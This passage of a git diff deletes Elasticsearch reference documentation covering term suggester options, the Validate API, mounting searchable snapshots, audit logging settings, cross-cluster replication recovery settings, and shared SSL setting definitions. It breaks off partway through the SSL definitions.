- partitioned amongst shards, the shard level document frequencies of - spelling corrections may not be precise. Increasing this will make these - document frequencies more precise. 
- -`max_inspections`:: - A factor that is used to multiply with the - `shards_size` in order to inspect more candidate spelling corrections on - the shard level. Can improve accuracy at the cost of performance. - Defaults to 5. - -`min_doc_freq`:: - The minimal threshold in number of documents a - suggestion should appear in. This can be specified as an absolute number - or as a relative percentage of number of documents. This can improve - quality by only suggesting high frequency terms. Defaults to 0f and is - not enabled. If a value higher than 1 is specified, then the number - cannot be fractional. The shard level document frequencies are used for - this option. - -`max_term_freq`:: - The maximum threshold in number of documents in which a - suggest text token can exist in order to be included. Can be a relative - percentage number (e.g., 0.4) or an absolute number to represent document - frequencies. If a value higher than 1 is specified, then fractional can - not be specified. Defaults to 0.01f. This can be used to exclude high - frequency terms -- which are usually spelled correctly -- from being spellchecked. - This also improves the spellcheck performance. The shard level document frequencies - are used for this option. - -`string_distance`:: - Which string distance implementation to use for comparing how similar - suggested terms are. Five possible values can be specified: - - ** `internal`: The default based on damerau_levenshtein but highly optimized - for comparing string distance for terms inside the index. - ** `damerau_levenshtein`: String distance algorithm based on - Damerau-Levenshtein algorithm. - ** `levenshtein`: String distance algorithm based on Levenshtein edit distance - algorithm. - ** `jaro_winkler`: String distance algorithm based on Jaro-Winkler algorithm. - ** `ngram`: String distance algorithm based on character n-grams. diff --git a/docs/reference/search/validate.asciidoc b/docs/reference/search/validate.asciidoc deleted file mode 100644 index 624fd039af3..00000000000 --- a/docs/reference/search/validate.asciidoc +++ /dev/null @@ -1,295 +0,0 @@ -[[search-validate]] -=== Validate API - -Validates a potentially expensive query without executing it. - -[source,console] --------------------------------------------------- -GET my-index-000001/_validate/query?q=user.id:kimchy --------------------------------------------------- -// TEST[setup:my_index] - - -[[search-validate-api-request]] -==== {api-request-title} - -`GET //_validate/` - - -[[search-validate-api-desc]] -==== {api-description-title} - -The validate API allows you to validate a potentially expensive query -without executing it. The query can be sent either as a path parameter or in the -request body. - - -[[search-validate-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases to search. -Wildcard (`*`) expressions are supported. -+ -To search all data streams or indices in a cluster, omit this parameter or use -`_all` or `*`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=query] - - -[[search-validate-api-query-params]] -==== {api-query-parms-title} - -`all_shards`:: - (Optional, Boolean) If `true`, the validation is executed on all shards - instead of one random shard per index. Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `false`. 
- -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=analyzer] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=analyze_wildcard] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=default_operator] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=df] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] - -`explain`:: - (Optional, Boolean) If `true`, the response returns detailed information if an - error has occurred. Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=lenient] - -`rewrite`:: - (Optional, Boolean) If `true`, returns a more detailed explanation showing the - actual Lucene query that will be executed. Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=search-q] - - -[[search-validate-api-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -PUT my-index-000001/_bulk?refresh -{"index":{"_id":1}} -{"user" : { "id": "kimchy" }, "@timestamp" : "2099-11-15T14:12:12", "message" : "trying out Elasticsearch"} -{"index":{"_id":2}} -{"user" : { "id": "kimchi" }, "@timestamp" : "2099-11-15T14:12:13", "message" : "My user ID is similar to kimchy!"} --------------------------------------------------- - - -When sent a valid query: - -[source,console] --------------------------------------------------- -GET my-index-000001/_validate/query?q=user.id:kimchy --------------------------------------------------- -// TEST[continued] - - -The response contains `valid:true`: - -[source,console-result] --------------------------------------------------- -{"valid":true,"_shards":{"total":1,"successful":1,"failed":0}} --------------------------------------------------- - - -The query may also be sent in the request body: - -[source,console] --------------------------------------------------- -GET my-index-000001/_validate/query -{ - "query" : { - "bool" : { - "must" : { - "query_string" : { - "query" : "*:*" - } - }, - "filter" : { - "term" : { "user.id" : "kimchy" } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -NOTE: The query being sent in the body must be nested in a `query` key, same as -the <> works - -If the query is invalid, `valid` will be `false`. 
Here the query is invalid
-because {es} knows the `@timestamp` field should be a date due to dynamic
-mapping, and 'foo' does not correctly parse into a date:
-
-[source,console]
--------------------------------------------------
-GET my-index-000001/_validate/query
-{
-  "query": {
-    "query_string": {
-      "query": "@timestamp:foo",
-      "lenient": false
-    }
-  }
-}
--------------------------------------------------
-// TEST[continued]
-
-[source,console-result]
--------------------------------------------------
-{"valid":false,"_shards":{"total":1,"successful":1,"failed":0}}
--------------------------------------------------
-
-===== The explain parameter
-
-An `explain` parameter can be specified to get more detailed information about
-why a query failed:
-
-[source,console]
--------------------------------------------------
-GET my-index-000001/_validate/query?explain=true
-{
-  "query": {
-    "query_string": {
-      "query": "@timestamp:foo",
-      "lenient": false
-    }
-  }
-}
--------------------------------------------------
-// TEST[continued]
-
-
-The API returns the following response:
-
-[source,console-result]
--------------------------------------------------
-{
-  "valid" : false,
-  "_shards" : {
-    "total" : 1,
-    "successful" : 1,
-    "failed" : 0
-  },
-  "explanations" : [ {
-    "index" : "my-index-000001",
-    "valid" : false,
-    "error" : "my-index-000001/IAEc2nIXSSunQA_suI0MLw] QueryShardException[failed to create query:...failed to parse date field [foo]"
-  } ]
-}
--------------------------------------------------
-// TESTRESPONSE[s/"error" : "[^\"]+"/"error": "$body.explanations.0.error"/]
-
-===== The rewrite parameter
-
-When the query is valid, the explanation defaults to the string representation
-of that query. With `rewrite` set to `true`, the explanation is more detailed
-showing the actual Lucene query that will be executed.
-
-[source,console]
--------------------------------------------------
-GET my-index-000001/_validate/query?rewrite=true
-{
-  "query": {
-    "more_like_this": {
-      "like": {
-        "_id": "2"
-      },
-      "boost_terms": 1
-    }
-  }
-}
--------------------------------------------------
-// TEST[skip:the output is randomized depending on which shard we hit]
-
-
-The API returns the following response:
-
-[source,console-result]
--------------------------------------------------
-{
-  "valid": true,
-  "_shards": {
-    "total": 1,
-    "successful": 1,
-    "failed": 0
-  },
-  "explanations": [
-    {
-      "index": "my-index-000001",
-      "valid": true,
-      "explanation": "((user:terminator^3.71334 plot:future^2.763601 plot:human^2.8415773 plot:sarah^3.4193945 plot:kyle^3.8244398 plot:cyborg^3.9177752 plot:connor^4.040236 plot:reese^4.7133346 ... )~6) -ConstantScore(_id:2)) #(ConstantScore(_type:_doc))^0.0"
-    }
-  ]
-}
--------------------------------------------------
-
-
-===== Rewrite and all_shards parameters
-
-By default, the request is executed on a single shard only, which is randomly
-selected. The detailed explanation of the query may depend on which shard is
-being hit, and therefore may vary from one request to another. When rewriting
-queries, use the `all_shards` parameter to get a response from all available
-shards.
- -//// -[source,console] --------------------------------------------------- -PUT my-index-000001/_bulk?refresh -{"index":{"_id":1}} -{"user" : { "id": "kimchy" }, "@timestamp" : "2099-11-15T14:12:12", "message" : "trying out Elasticsearch"} -{"index":{"_id":2}} -{"user" : { "id": "kimchi" }, "@timestamp" : "2099-11-15T14:12:13", "message" : "My user ID is similar to kimchy!"} --------------------------------------------------- -//// - -[source,console] --------------------------------------------------- -GET my-index-000001/_validate/query?rewrite=true&all_shards=true -{ - "query": { - "match": { - "user.id": { - "query": "kimchy", - "fuzziness": "auto" - } - } - } -} --------------------------------------------------- -// TEST[continued] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "valid": true, - "_shards": { - "total": 1, - "successful": 1, - "failed": 0 - }, - "explanations": [ - { - "index": "my-index-000001", - "shard": 0, - "valid": true, - "explanation": "(user.id:kimchi)^0.8333333 user.id:kimchy" - } - ] -} --------------------------------------------------- diff --git a/docs/reference/searchable-snapshots/apis/mount-snapshot.asciidoc b/docs/reference/searchable-snapshots/apis/mount-snapshot.asciidoc deleted file mode 100644 index 4b8f12d59c3..00000000000 --- a/docs/reference/searchable-snapshots/apis/mount-snapshot.asciidoc +++ /dev/null @@ -1,128 +0,0 @@ -[role="xpack"] -[testenv="enterprise"] -[[searchable-snapshots-api-mount-snapshot]] -=== Mount snapshot API -++++ -Mount snapshot -++++ - -beta::[] - -Mount a snapshot as a searchable snapshot index. - -[[searchable-snapshots-api-mount-request]] -==== {api-request-title} - -`POST /_snapshot///_mount` - -[[searchable-snapshots-api-mount-prereqs]] -==== {api-prereq-title} - -If the {es} {security-features} are enabled, you must have the -`manage` cluster privilege and the `manage` index privilege -for any included indices to use this API. -For more information, see <>. - -[[searchable-snapshots-api-mount-desc]] -==== {api-description-title} - - -[[searchable-snapshots-api-mount-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -The name of the repository containing -the snapshot of the index to mount. - -``:: -(Required, string) -The name of the snapshot of the index -to mount. - -[[searchable-snapshots-api-mount-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -`wait_for_completion`:: -(Optional, Boolean) If `true`, the request blocks until the operation is complete. -Defaults to `false`. - -[[searchable-snapshots-api-mount-request-body]] -==== {api-request-body-title} - -`index`:: -(Required, string) -Name of the index contained in the snapshot -whose data is to be mounted. - -If no `renamed_index` is specified this name -will also be used to create the new index. - -`renamed_index`:: -+ --- -(Optional, string) -Name of the index that will be created. --- - -`index_settings`:: -+ --- -(Optional, object) -Settings that should be added to the index when it is mounted. --- - -`ignore_index_settings`:: -+ --- -(Optional, array of strings) -Names of settings that should be removed from the index when it is mounted. 
---
-
-[[searchable-snapshots-api-mount-example]]
-==== {api-examples-title}
-////
-[source,console]
------------------------------------
-PUT /my_docs
-{
-  "settings" : {
-    "index.number_of_shards" : 1,
-    "index.number_of_replicas" : 0
-  }
-}
-
-PUT /_snapshot/my_repository/my_snapshot?wait_for_completion=true
-{
-  "include_global_state": false,
-  "indices": "my_docs"
-}
-
-DELETE /my_docs
------------------------------------
-// TEST[setup:setup-repository]
-////
-
-Mounts the index `my_docs` from an existing snapshot named `my_snapshot` stored
-in the `my_repository` repository as a new index `docs`:
-
-[source,console]
--------------------------------------------------
-POST /_snapshot/my_repository/my_snapshot/_mount?wait_for_completion=true
-{
-  "index": "my_docs", <1>
-  "renamed_index": "docs", <2>
-  "index_settings": { <3>
-    "index.number_of_replicas": 0
-  },
-  "ignore_index_settings": [ "index.refresh_interval" ] <4>
-}
--------------------------------------------------
-// TEST[continued]
-
-<1> The name of the index in the snapshot to mount
-<2> The name of the index to create
-<3> Any index settings to add to the new index
-<4> List of index settings to ignore when mounting the snapshotted index
diff --git a/docs/reference/searchable-snapshots/apis/searchable-snapshots-apis.asciidoc b/docs/reference/searchable-snapshots/apis/searchable-snapshots-apis.asciidoc
deleted file mode 100644
index 1cdf2834a34..00000000000
--- a/docs/reference/searchable-snapshots/apis/searchable-snapshots-apis.asciidoc
+++ /dev/null
@@ -1,12 +0,0 @@
-[role="xpack"]
-[testenv="enterprise"]
-[[searchable-snapshots-apis]]
-== Searchable snapshots APIs
-
-beta::[]
-
-You can use the following APIs to perform searchable snapshot operations.
-
-* <>
-
-include::mount-snapshot.asciidoc[]
diff --git a/docs/reference/searchable-snapshots/index.asciidoc b/docs/reference/searchable-snapshots/index.asciidoc
deleted file mode 100644
index c2d6b3e109c..00000000000
--- a/docs/reference/searchable-snapshots/index.asciidoc
+++ /dev/null
@@ -1,100 +0,0 @@
-[[searchable-snapshots]]
-== {search-snaps-cap}
-
-beta::[]
-
-{search-snaps-cap} let you reduce your operating costs by using
-<> for resiliency rather than maintaining
-<> within a cluster. When you mount an index from a
-snapshot as a {search-snap}, {es} copies the index shards to local storage
-within the cluster. This ensures that search performance is comparable to
-searching any other index, and minimizes the need to access the snapshot
-repository. Should a node fail, shards of a {search-snap} index are
-automatically recovered from the snapshot repository.
-
-This can result in significant cost savings for less frequently searched data.
-With {search-snaps}, you no longer need an extra index shard copy to avoid data
-loss, potentially halving the node local storage capacity necessary for
-searching that data. Because {search-snaps} rely on the same snapshot mechanism
-you use for backups, they have a minimal impact on your snapshot repository
-storage costs.
-
-[discrete]
-[[using-searchable-snapshots]]
-=== Using {search-snaps}
-
-Searching a {search-snap} index is the same as searching any other index.
-Search performance is comparable to regular indices because the shard data is
-copied onto nodes in the cluster when the {search-snap} is mounted.
-
-By default, {search-snap} indices have no replicas. The underlying snapshot
-provides resilience and the query volume is expected to be low enough that a
-single shard copy will be sufficient.
However, if you need to support a higher -query volume, you can add replicas by adjusting the `index.number_of_replicas` -index setting. - -If a node fails and {search-snap} shards need to be restored from the snapshot, -there is a brief window of time while {es} allocates the shards to other nodes -where the cluster health will not be `green`. Searches that hit these shards -will fail or return partial results until they are reallocated. - -You typically manage {search-snaps} through {ilm-init}. The -<> action automatically converts -an index to a {search-snap} when it reaches the `cold` phase. You can also make -indices in existing snapshots searchable by manually mounting them as -{search-snaps} with the <> API. - -To mount an index from a snapshot that contains multiple indices, we recommend -creating a <> of the snapshot that contains only the -index you want to search, and mounting the clone. You cannot delete a snapshot -if it has any mounted indices, so creating a clone enables you to manage the -lifecycle of the backup snapshot independently of any {search-snaps}. - -You can control the allocation of the shards of {search-snap} indices using the -same mechanisms as for regular indices. For example, you could use -<> to restrict {search-snap} shards to a subset of -your nodes. - -We recommend that you <> indices to a single -segment per shard before taking a snapshot that will be mounted as a -{search-snap} index. Each read from a snapshot repository takes time and costs -money, and the fewer segments there are the fewer reads are needed to restore -the snapshot. - -[TIP] -==== -{search-snaps-cap} are ideal for managing a large archive of historical data. -Historical information is typically searched less frequently than recent data -and therefore may not need replicas for their performance benefits. - -For more complex or time-consuming searches, you can use <> with -{search-snaps}. -==== - -[discrete] -[[how-searchable-snapshots-work]] -=== How {search-snaps} work - -When an index is mounted from a snapshot, {es} allocates its shards to data -nodes within the cluster. The data nodes then automatically restore the shard -data from the repository onto local storage. Once the restore process -completes, these shards respond to searches using the data held in local -storage and do not need to access the repository. This avoids incurring the -cost or performance penalty associated with reading data from the repository. - -If a node holding one of these shards fails, {es} automatically allocates it to -another node, and that node restores the shard data from the repository. No -replicas are needed, and no complicated monitoring or orchestration is -necessary to restore lost shards. - -{es} restores {search-snap} shards in the background and you can search them -even if they have not been fully restored. If a search hits a {search-snap} -shard before it has been fully restored, {es} eagerly retrieves the data needed -for the search. If a shard is freshly allocated to a node and still warming up, -some searches will be slower. However, searches typically access a very small -fraction of the total shard data so the performance penalty is typically small. - -Replicas of {search-snaps} shards are restored by copying data from the -snapshot repository. In contrast, replicas of regular indices are restored by -copying data from the primary. 
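-
-If you do decide to add replicas to a mounted index, as described in the "Using
-{search-snaps}" section above, the change is an ordinary index settings update.
-The following is a minimal sketch, not a required step; the index name `docs`
-is a placeholder for whatever name you chose when mounting the snapshot.
-
-[source,console]
--------------------------------------------------
-PUT /docs/_settings
-{
-  "index.number_of_replicas": 1 <1>
-}
--------------------------------------------------
-// TEST[skip:illustrative sketch only]
-
-<1> The added replica is restored by copying data from the snapshot repository,
-not from the primary.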
diff --git a/docs/reference/settings/audit-settings.asciidoc b/docs/reference/settings/audit-settings.asciidoc deleted file mode 100644 index 72241f683e3..00000000000 --- a/docs/reference/settings/audit-settings.asciidoc +++ /dev/null @@ -1,153 +0,0 @@ -[role="xpack"] -[[auditing-settings]] -=== Auditing security settings -++++ -Auditing settings -++++ - -[[auditing-settings-description]] -You can use <> to record security-related -events, such as authentication failures, refused connections, and data-access -events. - -If configured, auditing settings must be set on every node in the cluster. -Static settings, such as `xpack.security.audit.enabled`, must be configured in -`elasticsearch.yml` on each node. For dynamic auditing settings, use the -<> to ensure the setting is -the same on all nodes. - -[[general-audit-settings]] -==== General Auditing Settings -[[xpack-security-audit-enabled]] -// tag::xpack-security-audit-enabled-tag[] -`xpack.security.audit.enabled`:: -(<>) -Set to `true` to enable auditing on the node. The default value is `false`. This -puts the auditing events in a dedicated file named `_audit.json` on -each node. -+ -If enabled, this setting must be configured in `elasticsearch.yml` on all nodes -in the cluster. -// end::xpack-security-audit-enabled-tag[] - -[[event-audit-settings]] -==== Audited Event Settings - -The events and some other information about what gets logged can be controlled -by using the following settings: - -[[xpack-sa-lf-events-include]] -// tag::xpack-sa-lf-events-include-tag[] -`xpack.security.audit.logfile.events.include`:: -(<>) -Specifies which events to include in the auditing output. The default value is: -`access_denied, access_granted, anonymous_access_denied, authentication_failed, -connection_denied, tampered_request, run_as_denied, run_as_granted`. -// end::xpack-sa-lf-events-include-tag[] - -[[xpack-sa-lf-events-exclude]] -// tag::xpack-sa-lf-events-exclude-tag[] -`xpack.security.audit.logfile.events.exclude`:: -(<>) -Excludes the specified events from the output. By default, no events are -excluded. -// end::xpack-sa-lf-events-exclude-tag[] - -[[xpack-sa-lf-events-emit-request]] -// tag::xpack-sa-lf-events-emit-request-tag[] -`xpack.security.audit.logfile.events.emit_request_body`:: -(<>) -Specifies whether to include the request body from REST requests on certain -event types such as `authentication_failed`. The default value is `false`. -+ --- -IMPORTANT: No filtering is performed when auditing, so sensitive data may be -audited in plain text when including the request body in audit events. --- - -// end::xpack-sa-lf-events-emit-request-tag[] - -[[node-audit-settings]] -==== Local Node Info Settings - -[[xpack-sa-lf-emit-node-name]] -// tag::xpack-sa-lf-emit-node-name-tag[] -`xpack.security.audit.logfile.emit_node_name`:: -(<>) -Specifies whether to include the <> as a field in -each audit event. The default value is `false`. -// end::xpack-sa-lf-emit-node-name-tag[] - -[[xpack-sa-lf-emit-node-host-address]] -// tag::xpack-sa-lf-emit-node-host-address-tag[] -`xpack.security.audit.logfile.emit_node_host_address`:: -(<>) -Specifies whether to include the node's IP address as a field in each audit event. -The default value is `false`. -// end::xpack-sa-lf-emit-node-host-address-tag[] - -[[xpack-sa-lf-emit-node-host-name]] -// tag::xpack-sa-lf-emit-node-host-name-tag[] -`xpack.security.audit.logfile.emit_node_host_name`:: -(<>) -Specifies whether to include the node's host name as a field in each audit event. 
-The default value is `false`. -// end::xpack-sa-lf-emit-node-host-name-tag[] - -[[xpack-sa-lf-emit-node-id]] -// tag::xpack-sa-lf-emit-node-id-tag[] -`xpack.security.audit.logfile.emit_node_id`:: -(<>) -Specifies whether to include the node id as a field in each audit event. -This is available for the new format only. That is to say, this information -does not exist in the `_access.log` file. -Unlike <>, whose value might change if the administrator -changes the setting in the config file, the node id will persist across cluster -restarts and the administrator cannot change it. -The default value is `true`. -// end::xpack-sa-lf-emit-node-id-tag[] - -[[audit-event-ignore-policies]] -==== Audit Logfile Event Ignore Policies - -These settings affect the <> -that enable fine-grained control over which audit events are printed to the log file. -All of the settings with the same policy name combine to form a single policy. -If an event matches all of the conditions for a specific policy, it is ignored -and not printed. - -[[xpack-sa-lf-events-ignore-users]] -// tag::xpack-sa-lf-events-ignore-users-tag[] -`xpack.security.audit.logfile.events.ignore_filters..users`:: -(<>) -A list of user names or wildcards. The specified policy will -not print audit events for users matching these values. -// end::xpack-sa-lf-events-ignore-users-tag[] - -[[xpack-sa-lf-events-ignore-realms]] -// tag::xpack-sa-lf-events-ignore-realms-tag[] -`xpack.security.audit.logfile.events.ignore_filters..realms`:: -(<>) -A list of authentication realm names or wildcards. The specified policy will -not print audit events for users in these realms. -// end::xpack-sa-lf-events-ignore-realms-tag[] - -[[xpack-sa-lf-events-ignore-roles]] -// tag::xpack-sa-lf-events-ignore-roles-tag[] -`xpack.security.audit.logfile.events.ignore_filters..roles`:: -(<>) -A list of role names or wildcards. The specified policy will -not print audit events for users that have these roles. If the user has several -roles, some of which are *not* covered by the policy, the policy will -*not* cover this event. -// end::xpack-sa-lf-events-ignore-roles-tag[] - -[[xpack-sa-lf-events-ignore-indices]] -// tag::xpack-sa-lf-events-ignore-indices-tag[] -`xpack.security.audit.logfile.events.ignore_filters..indices`:: -(<>) -A list of index names or wildcards. The specified policy will -not print audit events when all the indices in the event match -these values. If the event concerns several indices, some of which are -*not* covered by the policy, the policy will *not* cover this event. -// end::xpack-sa-lf-events-ignore-indices-tag[] diff --git a/docs/reference/settings/ccr-settings.asciidoc b/docs/reference/settings/ccr-settings.asciidoc deleted file mode 100644 index 8124b7c3672..00000000000 --- a/docs/reference/settings/ccr-settings.asciidoc +++ /dev/null @@ -1,52 +0,0 @@ -[role="xpack"] -[[ccr-settings]] -=== {ccr-cap} settings - -These {ccr} settings can be dynamically updated on a live cluster with the -<>. - -[discrete] -[[ccr-recovery-settings]] -==== Remote recovery settings - -The following setting can be used to rate-limit the data transmitted during -<>: - -`ccr.indices.recovery.max_bytes_per_sec` (<>):: -Limits the total inbound and outbound remote recovery traffic on each node. -Since this limit applies on each node, but there may be many nodes performing -remote recoveries concurrently, the total amount of remote recovery bytes may be -much higher than this limit. 
If you set this limit too high then there is a risk -that ongoing remote recoveries will consume an excess of bandwidth (or other -resources) which could destabilize the cluster. This setting is used by both the -leader and follower clusters. For example if it is set to `20mb` on a leader, -the leader will only send `20mb/s` to the follower even if the follower is -requesting and can accept `60mb/s`. Defaults to `40mb`. - -[discrete] -[[ccr-advanced-recovery-settings]] -==== Advanced remote recovery settings - -The following _expert_ settings can be set to manage the resources consumed by -remote recoveries: - -`ccr.indices.recovery.max_concurrent_file_chunks` (<>):: -Controls the number of file chunk requests that can be sent in parallel per -recovery. As multiple remote recoveries might already running in parallel, -increasing this expert-level setting might only help in situations where remote -recovery of a single shard is not reaching the total inbound and outbound remote recovery traffic as configured by `ccr.indices.recovery.max_bytes_per_sec`. -Defaults to `5`. The maximum allowed value is `10`. - -`ccr.indices.recovery.chunk_size`(<>):: -Controls the chunk size requested by the follower during file transfer. Defaults to -`1mb`. - -`ccr.indices.recovery.recovery_activity_timeout`(<>):: -Controls the timeout for recovery activity. This timeout primarily applies on -the leader cluster. The leader cluster must open resources in-memory to supply -data to the follower during the recovery process. If the leader does not receive recovery requests from the follower for this period of time, it will close the resources. Defaults to 60 seconds. - -`ccr.indices.recovery.internal_action_timeout` (<>):: -Controls the timeout for individual network requests during the remote recovery -process. An individual action timing out can fail the recovery. Defaults to -60 seconds. diff --git a/docs/reference/settings/common-defs.asciidoc b/docs/reference/settings/common-defs.asciidoc deleted file mode 100644 index ce66eb94b10..00000000000 --- a/docs/reference/settings/common-defs.asciidoc +++ /dev/null @@ -1,182 +0,0 @@ -tag::ssl-certificate[] -Specifies the path for the PEM encoded certificate (or certificate chain) that is -associated with the key. -+ -This setting can be used only if `ssl.key` is set. -end::ssl-certificate[] - -tag::ssl-certificate-authorities[] -List of paths to PEM encoded certificate files that should be trusted. -+ -This setting and `ssl.truststore.path` cannot be used at the same time. -end::ssl-certificate-authorities[] - -tag::ssl-cipher-suites-values[] -Supported cipher suites vary depending on which version of Java you use. 
For -example, for version 12 the default value is `TLS_AES_256_GCM_SHA384`, -`TLS_AES_128_GCM_SHA256`, `TLS_CHACHA20_POLY1305_SHA256`, -`TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384`, `TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256`, -`TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384`, `TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256`, -`TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256`, `TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256`, -`TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384`, `TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256`, -`TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384`, `TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256`, -`TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA`, `TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA`, -`TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA`, `TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA`, -`TLS_RSA_WITH_AES_256_GCM_SHA384`, `TLS_RSA_WITH_AES_128_GCM_SHA256`, -`TLS_RSA_WITH_AES_256_CBC_SHA256`, `TLS_RSA_WITH_AES_128_CBC_SHA256`, -`TLS_RSA_WITH_AES_256_CBC_SHA`, `TLS_RSA_WITH_AES_128_CBC_SHA`. -+ -For more information, see Oracle's -https://docs.oracle.com/en/java/javase/11/security/oracle-providers.html#GUID-7093246A-31A3-4304-AC5F-5FB6400405E2[Java Cryptography Architecture documentation]. -end::ssl-cipher-suites-values[] - -tag::ssl-cipher-suites-values-java11[] -Supported cipher suites vary depending on which version of Java you use. For -example, for version 11 the default value is `TLS_AES_256_GCM_SHA384`, -`TLS_AES_128_GCM_SHA256`, `TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384`, -`TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256`, `TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384`, -`TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256`, `TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384`, -`TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256`, `TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384`, -`TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256`, `TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA`, -`TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA`, `TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA`, -`TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA`, `TLS_RSA_WITH_AES_256_GCM_SHA384`, -`TLS_RSA_WITH_AES_128_GCM_SHA256`, `TLS_RSA_WITH_AES_256_CBC_SHA256`, -`TLS_RSA_WITH_AES_128_CBC_SHA256`, `TLS_RSA_WITH_AES_256_CBC_SHA`, -`TLS_RSA_WITH_AES_128_CBC_SHA`. -+ --- -NOTE: The default cipher suites list above includes TLSv1.3 ciphers and ciphers -that require the _Java Cryptography Extension (JCE) Unlimited Strength -Jurisdiction Policy Files_ for 256-bit AES encryption. If TLSv1.3 is not -available, the TLSv1.3 ciphers `TLS_AES_256_GCM_SHA384` and -`TLS_AES_128_GCM_SHA256` are not included in the default list. If 256-bit AES is -unavailable, ciphers with `AES_256` in their names are not included in the -default list. Finally, AES GCM has known performance issues in Java versions -prior to 11 and is included in the default list only when using Java 11 or above. - -For more information, see Oracle's -https://docs.oracle.com/en/java/javase/11/security/oracle-providers.html#GUID-7093246A-31A3-4304-AC5F-5FB6400405E2[Java Cryptography Architecture documentation]. --- -end::ssl-cipher-suites-values-java11[] - -tag::ssl-key-pem[] -Path to a PEM encoded file containing the private key. -+ -If HTTP client authentication is required, it uses this file. You cannot use -this setting and `ssl.keystore.path` at the same time. -end::ssl-key-pem[] - -tag::ssl-key-passphrase[] -The passphrase that is used to decrypt the private key. Since the key might not -be encrypted, this value is optional. -+ -You cannot use this setting and `ssl.secure_key_passphrase` at the same time. -end::ssl-key-passphrase[] - -tag::ssl-keystore-key-password[] -The password for the key in the keystore. 
The default is the keystore password. -+ -You cannot use this setting and `ssl.keystore.secure_password` at the same time. -//TBD: You cannot use this setting and `ssl.keystore.secure_key_password` at the same time. -end::ssl-keystore-key-password[] - -tag::ssl-keystore-password[] -The password for the keystore. -//TBD: You cannot use this setting and `ssl.keystore.secure_password` at the same time. -end::ssl-keystore-password[] - -tag::ssl-keystore-path[] -The path for the keystore file that contains a private key and certificate. -+ -It must be either a Java keystore (jks) or a PKCS#12 file. You cannot use this -setting and `ssl.key` at the same time. -//TBD: It must be either a Java keystore (jks) or a PKCS#12 file. -//TBD: You cannot use this setting and `ssl.key` at the same time. -end::ssl-keystore-path[] - -tag::ssl-keystore-secure-key-password[] -The password for the key in the keystore. The default is the keystore password. -//TBD: You cannot use this setting and `ssl.keystore.key_password` at the same time. -end::ssl-keystore-secure-key-password[] - -tag::ssl-keystore-secure-password[] -The password for the keystore. -//TBD: You cannot use this setting and `ssl.keystore.password` at the same time. -end::ssl-keystore-secure-password[] - -tag::ssl-keystore-type-pkcs12[] -The format of the keystore file. It must be either `jks` or `PKCS12`. If the -keystore path ends in ".p12", ".pfx", or ".pkcs12", this setting defaults -to `PKCS12`. Otherwise, it defaults to `jks`. -end::ssl-keystore-type-pkcs12[] - -tag::ssl-secure-key-passphrase[] -The passphrase that is used to decrypt the private key. Since the key might not -be encrypted, this value is optional. -//TBD: You cannot use this setting and `ssl.key_passphrase` at the same time. -end::ssl-secure-key-passphrase[] - -tag::ssl-supported-protocols[] -Supported protocols with versions. Valid protocols: `SSLv2Hello`, -`SSLv3`, `TLSv1`, `TLSv1.1`, `TLSv1.2`, `TLSv1.3`. If the JVM's SSL provider supports TLSv1.3, -the default is `TLSv1.3,TLSv1.2,TLSv1.1`. Otherwise, the default is -`TLSv1.2,TLSv1.1`. -+ --- -NOTE: If `xpack.security.fips_mode.enabled` is `true`, you cannot use `SSLv2Hello` -or `SSLv3`. See <>. - --- -end::ssl-supported-protocols[] - -tag::ssl-truststore-password[] -The password for the truststore. -+ -You cannot use this setting and `ssl.truststore.secure_password` at the same -time. -//TBD: You cannot use this setting and `ssl.truststore.secure_password` at the same time. -end::ssl-truststore-password[] - -tag::ssl-truststore-path[] -The path for the keystore that contains the certificates to trust. It must be -either a Java keystore (jks) or a PKCS#12 file. -+ -You cannot use this setting and `ssl.certificate_authorities` at the same time. -//TBD: You cannot use this setting and `ssl.certificate_authorities` at the same time. -end::ssl-truststore-path[] - -tag::ssl-truststore-secure-password[] -Password for the truststore. -//TBD: You cannot use this setting and `ssl.truststore.password` at the same time. -end::ssl-truststore-secure-password[] - -tag::ssl-truststore-type[] -The format 